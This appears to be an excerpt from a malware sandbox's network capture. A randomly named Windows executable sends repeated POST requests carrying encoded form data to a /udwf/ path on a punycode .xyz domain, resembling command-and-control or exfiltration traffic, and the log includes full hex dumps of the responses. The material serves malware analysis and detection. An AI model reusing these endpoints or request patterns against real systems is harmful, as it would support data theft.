Zyu8jAAgqGyZBaIa3IZkKpnFXBDvpfJDlVvkEOXLZkEenlQ+69VtBZzbzMw1REe7EzXIMJI8WCP1Ga5m+2Vz3LcDcS9ni52kjTK
                                                                                                                            Nov 10, 2023 09:27:51.133230925 CET97INHTTP/1.1 404 Not Found
                                                                                                                            Date: Fri, 10 Nov 2023 08:27:51 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            X-Sorting-Hat-PodId: 293
                                                                                                                            X-Sorting-Hat-ShopId: 83935199526
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-ShopId: 83935199526
                                                                                                                            X-ShardId: 293
                                                                                                                            Content-Language: en-US
                                                                                                                            Set-Cookie: localization=US; path=/; expires=Sun, 10 Nov 2024 08:27:50 GMT; SameSite=Lax
                                                                                                                            Set-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Sat, 11 Nov 2023 08:27:51 GMT; SameSite=Lax
                                                                                                                            Set-Cookie: _shopify_y=8e7d96c0-29b1-4ebb-bc12-0695b29b2f51; Expires=Sat, 09-Nov-24 08:27:51 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                            Set-Cookie: _shopify_s=5a1d3429-a0f5-43f8-a851-d97cd1a79574; Expires=Fri, 10-Nov-23 08:57:51 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                            Server-Timing: processing;dur=155
                                                                                                                            X-Shopify-Stage: production
                                                                                                                            Content-Security-Policy: ; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=ed4b21a8-ae7c-4d8
                                                                                                                            Data Raw:
                                                                                                                            Data Ascii:
                                                                                                                            Nov 10, 2023 09:27:51.133271933 CET98INData Raw: 2d 61 37 34 32 2d 35 34 66 33 63 34 65 36 36 32 63 65 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 58 2d 44 6f 77 6e 6c 6f 61 64 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 6f 70 65 6e 0d 0a 58
                                                                                                                            Data Ascii: -a742-54f3c4e662ceX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontrol
                                                                                                                            Nov 10, 2023 09:27:51.133285046 CET99INData Raw: 36 37 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 58 5b 6f db 36 14 7e ef af e0 54 0c 68 07 dd 29 5b b6 2a a7 6b d3 76 1b 90 76 c5 3a 60 d8 de 68 89 b6 d8 c8 a2 46 d1 76 d2 a2 ff 7d 87 a4 28 4b 89 d3 ae 09 1a f3 72 ae df b9 f0 b8 f9 0f af 7e bf fc
                                                                                                                            Data Ascii: 679X[o6~Th)[*kvv:`hFv}(Kr~Q%w\}4CGPR^<B(QIPQQrr-.$5Hs85dGW**x#irzP@KmMmV]:@B?hEIE>C;"Q%kj'oo}RG\|/Z]
                                                                                                                            Nov 10, 2023 09:27:51.133299112 CET99INData Raw: 8c 18 81 16 bc 9c 59 a6 d0 8f 63 90 60 e4 5d 4d cc 9a ee fe 71 74 22 7e d0 09 38 4e c5 c7 af 97 2f 5f 63 95 22 e6 4a b7 de 95 13 0f 07 ea b1 f9 c8 19 54 99 9e 6e 9d 8b 3c 50 38 7c 1b 24 70 3d 9d b9 f1 02 5d da 95 bf 9c cf 15 3e f0 e1 c6 00 d3 0c
                                                                                                                            Data Ascii: Yc`]Mqt"~8N/_c"JTn<P8|$p=]>6BblS?VfAs r^aV$/MYspc1AvrX_E }y=grH6VujfTq.>pZA)"n>9xdvya*|tVt
                                                                                                                            Nov 10, 2023 09:27:51.133311033 CET99INData Raw: 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            30192.168.2.104974535.227.246.10480C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:29:32.513824940 CET257OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.xn--4gq62f8w1alm9b.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.xn--4gq62f8w1alm9b.xyz
                                                                                                                            Referer: http://www.xn--4gq62f8w1alm9b.xyz/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 208
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 31 51 77 6c 4b 4b 30 51 44 45 6e 68 6b 75 51 46 6f 4b 51 52 56 51 2f 46 6f 48 79 2f 7a 36 4f 38 6b 6c 59 51 68 72 62 57 41 71 59 66 64 73 38 5a 59 42 6c 43 35 6b 64 6e 56 62 70 71 78 73 5a 68 4c 63 4f 4a 44 78 78 4f 66 6d 61 50 65 6d 70 4e 61 38 73 44 4d 6e 69 6f 51 72 32 50 39 63 31 44 75 44 42 48 74 6d 52 34 51 42 75 46 62 57 74 64 69 2b 63 42 55 6f 52 4b 51 52 71 52 4d 6f 7a 56 50 30 38 32 56 70 35 58 43 67 49 2f 31 2b 4f 2f 51 68 54 5a 42 73 33 42 73 2b 54 43 42 48 7a 53 61 32 47 69 69 33 6f 4c 46 45 45 42 6b 78 43 6d 72 39 36 63 39 7a 51 4c 4b 68 4e 41 4a 36 44 50 4d 75 5a 46 46 72 49 3d
                                                                                                                            Data Ascii: G0Yxd2Q=1QwlKK0QDEnhkuQFoKQRVQ/FoHy/z6O8klYQhrbWAqYfds8ZYBlC5kdnVbpqxsZhLcOJDxxOfmaPempNa8sDMnioQr2P9c1DuDBHtmR4QBuFbWtdi+cBUoRKQRqRMozVP082Vp5XCgI/1+O/QhTZBs3Bs+TCBHzSa2Gii3oLFEEBkxCmr96c9zQLKhNAJ6DPMuZFFrI=
                                                                                                                            Nov 10, 2023 09:29:32.805963993 CET258INHTTP/1.1 405 Method Not Allowed
                                                                                                                            Server: nginx/1.20.2
                                                                                                                            Date: Fri, 10 Nov 2023 08:29:32 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 157
                                                                                                                            Via: 1.1 google
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            31192.168.2.104974635.227.246.10480C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:29:35.185496092 CET260OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.xn--4gq62f8w1alm9b.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.xn--4gq62f8w1alm9b.xyz
                                                                                                                            Referer: http://www.xn--4gq62f8w1alm9b.xyz/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 1220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 31 51 77 6c 4b 4b 30 51 44 45 6e 68 6b 75 51 46 6f 4b 51 52 56 51 2f 46 6f 48 79 2f 7a 36 4f 38 6b 6c 59 51 68 72 62 57 41 72 67 66 61 64 63 5a 5a 69 39 43 6f 55 64 6e 57 62 70 76 78 73 5a 47 4c 63 47 4e 44 78 4e 30 66 6c 69 50 65 45 52 4e 63 49 34 44 47 6e 69 6f 66 4c 32 4b 35 63 30 65 75 44 52 62 74 6d 42 34 51 42 75 46 62 51 4a 64 6b 71 49 42 48 34 52 4c 47 42 71 6a 66 34 7a 70 50 30 6b 6d 56 6f 35 74 46 51 6f 2f 31 65 65 2f 64 33 50 5a 43 4d 33 44 74 2b 53 48 42 48 2f 7a 61 32 62 5a 69 30 30 68 46 44 77 42 33 55 6a 6b 30 38 79 77 2b 69 52 52 4c 56 4a 79 4f 74 43 74 49 63 35 37 58 38 64 4b 6f 32 70 48 2f 34 64 32 6d 31 44 71 38 67 48 47 58 78 46 52 76 76 70 77 45 71 73 66 2b 6d 30 76 4e 56 42 58 52 55 59 75 4d 75 76 6f 7a 51 70 51 6c 56 4e 67 6f 75 2b 44 70 69 53 74 44 72 6e 42 6c 44 65 47 66 66 68 37 65 57 43 33 6b 44 33 4a 70 6f 78 58 54 4e 4c 77 78 4a 32 51 2f 66 75 4f 53 37 76 48 47 6e 5a 5a 61 35 6d 62 6f 31 63 32 4b 6a 34 4d 38 46 54 30 43 2f 74 79 34 6e 4c 57 2b 2f 55 74 65 2f 2f 71 57 63 51 68 6a 4b 62 41 53 4a 53 7a 74 5a 50 51 79 38 6b 57 62 37 34 46 6a 76 2b 41 41 41 74 6b 78 36 33 72 4b 68 4f 73 2b 4a 4d 38 2b 30 74 45 37 73 67 69 53 57 67 44 49 73 52 55 78 31 2f 63 51 7a 58 42 78 4f 31 4d 33 51 68 70 48 7a 51 71 69 69 52 4e 46 69 50 2f 62 72 6f 56 75 41 69 76 32 37 31 50 51 37 2f 72 55 43 6e 2f 58 6c 57 35 61 79 4d 65 77 68 72 6f 4f 38 5a 46 49 7a 69 32 4f 71 69 4b 55 52 2b 65 51 7a 35 49 34 35 54 4f 57 55 77 38 49 67 48 79 50 4e 75 7a 30 38 4f 48 68 36 75 54 67 74 33 6b 7a 47 33 33 35 74 4b 54 63 57 4f 4e 47 64 6f 53 6a 48 2b 39 5a 70 63 6f 32 4b 52 49 50 59 38 44 34 2b 2f 49 56 74 49 6b 35 49 75 4b 4e 76 36 66 46 47 34 56 33 47 56 61 73 4c 65 67 2b 6a 6e 56 4d 48 32 61 35 6b 37 33 70 46 36 58 44 72 70 4f 6d 70 5a 47 51 58 65 32 2b 61 38 70 72 58 38 6e 77 6b 34 4b 67 73 71 6a 33 2b 78 55 56 39 43 63 78 31 32 71 42 31 32 61 2b 45 4f 69 59 33 4f 6b 73 51 5a 6d 67 41 66 39 54 6c 78 62 45 4a 59 2f 52 2b 6f 51 46 75 42 79 6e 7a 43 68 74 50 2f 45 70 33 68 69 2b 33 31 72 6e 57 41 68 76 56 59 55 4c 70 78 6f 4c 4a 36 62 36 65 62 45 46 4b 61 38 74 5a 78 49 61 50 35 76 57 4d 75 4f 6c 6a 72 75 4a 41 75 6d 32 55 72 6f 4a 66 33 49 4e 75 73 4b 39 2b 4b 49 6f 56 61 78 43 39 48 4d 36 56 30 52 53 43 77 66 30 74 76 68 39 6e 48 72 4e 59 30 70 6e 59 70 57 49 45 79 39 6f 59 62 38 76 66 65 4e 70 6a 74 73 63 72 52 42 64 73 52 7a 73 6b 6d 74 67 57 36 76 55 48 51 71 6f 39 6d 34 77 2b 69 69 62 75 68 6a 49 52 64 43 2f 51 59 68 49 54 2b 75 74 43 51 6d 7a 73 63 4d 6f 55 2f 49 34 61 67 35 4e 65 66 6b 51 44 48 64 30 31 4d 30 62 38 6a 6b 70 33 4c 73 2b 6b 39 6c 34 44 48 45 78 4a 48 63 4b 4f 32 33 37 50 41 69 38 41 2f 34 4a 73 64 54 43 44 6c 53 4e 62 71 35 6c 5a 5a 64 79 5a 7a 41 68 57 37 4f 61 72 6a 45 35 34 73 6f 7a 39 74 4f 56 76 56 37 47 30 45 79 6b 64 58 73 6d 42 50 46 59 64 6b 41 69 43 48 5a 30 4f 6e 68 4c 41 6b 6a 6c 51 4c 5a 44 44 31 6e 50 50 62 77 77 59 77 52 31 78 44 59 52 78 46 41 52 33 34 57 37 69 55 52 6f 4a 4c 51 50 69 36 6b 6e 49 4b 58 66 37 2b 72 6e 36 45 5a 59 4c 37 58 75 77 71 55 4d 58 64 76 54 50 51 7a 30 63 74 67 5a 6a 70 56 43 63 47 67 74 6d 72 46 64 6d 6a 38 53 64 41 55 33 2b 30 6c 43 70 31 6a 5a 45 31 37 74 50 32 30 4a 61 2b 39 39 41 75 55 43 72 4f 6a 37 33 73 61 44 6e 34 4e 6f 50 42 67 75 47 79 4f 67 65 73 79 36 53 2b 55 65 6d 77 71 70 57 44 4b 75 2f 50 74 39 4a 54 74 79 6f 31 6c 56 57 70 4b 53 35 56 2f 56 6f 41 2f 6b 52 57 71 34 65 34 6f 35 61 6a 42 75 64 74 70 62 6f 4b 78 6a 30 55 6c 4f 47 52 36 4f 6f 59 34 79 39 6f 44 59 53 67 71 46 53 6c 4d 6e 6e 34 73 30 65 61 6d 2f 45 48 41 32 75 58 68 6d 75 44 47 68 62 2f 53 72 6c 73 33 4d 35 78 34 6a 47 6d 73 6b 50 2b 6c
                                                                                                                            Data Ascii: G0Yxd2Q=1QwlKK0QDEnhkuQFoKQRVQ/FoHy/z6O8klYQhrbWArgfadcZZi9CoUdnWbpvxsZGLcGNDxN0fliPeERNcI4DGniofL2K5c0euDRbtmB4QBuFbQJdkqIBH4RLGBqjf4zpP0kmVo5tFQo/1ee/d3PZCM3Dt+SHBH/za2bZi00hFDwB3Ujk08yw+iRRLVJyOtCtIc57X8dKo2pH/4d2m1Dq8gHGXxFRvvpwEqsf+m0vNVBXRUYuMuvozQpQlVNgou+DpiStDrnBlDeGffh7eWC3kD3JpoxXTNLwxJ2Q/fuOS7vHGnZZa5mbo1c2Kj4M8FT0C/ty4nLW+/Ute//qWcQhjKbASJSztZPQy8kWb74Fjv+AAAtkx63rKhOs+JM8+0tE7sgiSWgDIsRUx1/cQzXBxO1M3QhpHzQqiiRNFiP/broVuAiv271PQ7/rUCn/XlW5ayMewhroO8ZFIzi2OqiKUR+eQz5I45TOWUw8IgHyPNuz08OHh6uTgt3kzG335tKTcWONGdoSjH+9Zpco2KRIPY8D4+/IVtIk5IuKNv6fFG4V3GVasLeg+jnVMH2a5k73pF6XDrpOmpZGQXe2+a8prX8nwk4Kgsqj3+xUV9Ccx12qB12a+EOiY3OksQZmgAf9TlxbEJY/R+oQFuBynzChtP/Ep3hi+31rnWAhvVYULpxoLJ6b6ebEFKa8tZxIaP5vWMuOljruJAum2UroJf3INusK9+KIoVaxC9HM6V0RSCwf0tvh9nHrNY0pnYpWIEy9oYb8vfeNpjtscrRBdsRzskmtgW6vUHQqo9m4w+iibuhjIRdC/QYhIT+utCQmzscMoU/I4ag5NefkQDHd01M0b8jkp3Ls+k9l4DHExJHcKO237PAi8A/4JsdTCDlSNbq5lZZdyZzAhW7OarjE54soz9tOVvV7G0EykdXsmBPFYdkAiCHZ0OnhLAkjlQLZDD1nPPbwwYwR1xDYRxFAR34W7iURoJLQPi6knIKXf7+rn6EZYL7XuwqUMXdvTPQz0ctgZjpVCcGgtmrFdmj8SdAU3+0lCp1jZE17tP20Ja+99AuUCrOj73saDn4NoPBguGyOgesy6S+UemwqpWDKu/Pt9JTtyo1lVWpKS5V/VoA/kRWq4e4o5ajBudtpboKxj0UlOGR6OoY4y9oDYSgqFSlMnn4s0eam/EHA2uXhmuDGhb/Srls3M5x4jGmskP+l
                                                                                                                            Nov 10, 2023 09:29:35.478204966 CET261INHTTP/1.1 405 Method Not Allowed
                                                                                                                            Server: nginx/1.20.2
                                                                                                                            Date: Fri, 10 Nov 2023 08:29:35 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 157
                                                                                                                            Via: 1.1 google
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            32192.168.2.104974735.227.246.10480C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:29:37.858119965 CET261OUTGET /udwf/?G0Yxd2Q=4SYFJ+EdcnLhstYHjaYhZ0Xyh2Kg3P6YikQFgY7zApk8SZ1uWGpR3AVqWe4c3udQDum1CidNNnqrfkhOX4sOdDO6VZG27ug9uQ==&vhQT=aV8PeNo0MvDl1 HTTP/1.1
                                                                                                                            Host: www.xn--4gq62f8w1alm9b.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Nov 10, 2023 09:29:38.157619953 CET263INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.20.2
                                                                                                                            Date: Fri, 10 Nov 2023 08:29:37 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 5208
                                                                                                                            Last-Modified: Wed, 11 Oct 2023 10:00:52 GMT
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            ETag: "65267254-1458"
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Via: 1.1 google
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 77 70 6b 52 65 70 6f 72 74 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 67 6c 6f 62 61 6c 65 72 72 6f 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 26 26 28 77 69 6e 64 6f 77 2e 77 70 6b 3d 6e 65 77 20 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 28 7b 62 69 64 3a 22 62 65 72 67 2d 64 6f 77 6e 6c 6f 61 64 22 2c 72 65 6c 3a 22 32 2e 34 32 2e 30 22 2c 73 61 6d 70 6c 65 52 61 74 65 3a 31 2c 70 6c 75 67 69 6e 73 3a 5b 5b 77 69 6e 64 6f 77 2e 77 70 6b 67 6c 6f 62 61 6c 65 72 72 6f 72 50 6c 75 67 69 6e 2c 7b 6a 73 45 72 72 3a 21 30 2c 6a 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 2c 72 65 73 45 72 72 3a 21 30 2c 72 65 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 7d 5d 2c 5b 77 69 6e 64 6f 77 2e 77 70 6b 70 65 72 66 6f 72 6d 61 6e 63 65 50 6c 75 67 69 6e 2c 7b 65 6e 61 62 6c 65 3a 21 30 2c 73 61 6d 70 6c 65 52 61 74 65 3a 2e 35 7d 5d 5d 7d 29 2c 77 69 6e 64 6f 77 2e 77 70 6b 2e 69 6e 73 74 61 6c 6c 28 29 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 6c 6f 61 64 42 61 69 64 75 48 6d 74 28 74 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e7 99 be e5 ba a6 e7 bb 9f e8 ae a1 22 2c 74 29 3b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 65 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 22 2b 74 3b 76 61 72 20 6f 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e
                                                                                                                            Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.42.0",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){console.log("",t);var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?"+t;var o=document.getElementsByTagName("script")[0];o.parentNode.insertBefore(e,o)}function
                                                                                                                            Nov 10, 2023 09:29:38.157659054 CET264INData Raw: 20 62 61 69 64 75 50 75 73 68 28 74 2c 65 2c 6f 29 7b 77 69 6e 64 6f 77 2e 5f 68 6d 74 2e 70 75 73 68 28 5b 22 5f 74 72 61 63 6b 45 76 65 6e 74 22 2c 74 2c 65 2c 6f 5d 29 7d 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e5 8a a0 e8 bd bd e7 99 be e5 ba
                                                                                                                            Data Ascii: baiduPush(t,e,o){window._hmt.push(["_trackEvent",t,e,o])}console.log("..."),window._hmt=window._hmt||[];const BUILD_ENV="quark",token="42296466acbd6a1e84224ab1433a06cc";loadBaiduHmt(token)</script><script>function send
                                                                                                                            Nov 10, 2023 09:29:38.157677889 CET265INData Raw: 28 69 29 26 26 74 2e 70 75 73 68 28 22 22 2e 63 6f 6e 63 61 74 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 69 29 2c 22 3d 22 29 2e 63 6f 6e 63 61 74 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 5b 69 5d 29 29 29
                                                                                                                            Data Ascii: (i)&&t.push("".concat(encodeURIComponent(i),"=").concat(encodeURIComponent(a[i])));var c=t.join("&").replace(/%20/g,"+"),s="".concat("https://track.uc.cn/collect","?").concat(c,"&").concat("uc_param_str=dsfrpfvedncpssntnwbipreimeutsv");(e()||r
                                                                                                                            Nov 10, 2023 09:29:38.157699108 CET266INData Raw: 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 2c 24 73 63 72 69 70 74 31 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 24 73
                                                                                                                            Data Ascii: ument.getElementsByTagName("head")[0],$script1=document.createElement("script");$script1.setAttribute("crossorigin","anonymous"),$script1.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($sc
                                                                                                                            Nov 10, 2023 09:29:38.165056944 CET267INData Raw: 68 65 61 64 2e 6c 61 73 74 43 68 69 6c 64 29 2c 24 73 63 72 69 70 74 31 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b
                                                                                                                            Data Ascii: head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/js/vconsle.js"),$head.insertBefore(e,$head.lastChild)};bre
                                                                                                                            Nov 10, 2023 09:29:38.165117025 CET267INData Raw: 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 33 6f 2f 62 65 72 67 2f 73 74 61 74 69 63 2f 61 72 63 68 65 72 5f 69 6e 64 65 78 2e 33 36 39 61 36 36 33 62 30 38 61 35 35 64 33 30
                                                                                                                            Data Ascii: ript src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.369a663b08a55d305b97.js"></script></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
